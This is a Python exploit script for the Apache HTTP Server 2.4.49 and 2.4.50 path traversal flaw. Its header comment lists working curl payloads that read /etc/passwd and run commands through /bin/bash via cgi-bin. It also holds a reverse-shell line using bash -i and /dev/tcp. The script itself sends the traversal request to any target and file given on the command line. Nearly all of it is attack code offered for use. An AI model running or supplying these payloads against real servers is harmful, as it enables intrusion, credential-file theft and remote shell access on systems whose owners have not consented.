exploit-cve2021.py

#!/usr/bin/env python3
import sys
import requests
"""
[+] Exploit Title: Apache HTTP Server 2.4.49 Path Traversal
[+] Payload without cgi-bin:  curl -v 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd'
[+] Payload with cgi-bin =):  curl -v 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
[+] Payload without cgi-bin: apache 2.4.50: .%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
[+] Payload with cgi-bin =): apache 2.4.50: curl -v 'http://localhost:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
{+} It worked: curl -v 'http://localhost:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/target/1234 0>&1' -H "Content-Type: text/plain" =)
"""

def main():
    if sys.argv[1] == '-h':
        h = '''
        Example: python3 exploit-cve2021.py http://4P4(|-|3\/UL|\|3r4BL3-74r937 /file
        '''
        print(h)
    else:
        try:
            target = sys.argv[1]  # Your desired [target] url.
            file = sys.argv[2]    # Your desired [file] to request.

            payload = '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/'
            response = requests.get(f'http://{target}{payload}{file}')

            print(response.text)
        except:
            print('[-] Check your arguments again, bro.')
            exit()

if __name__ == '__main__':
    main()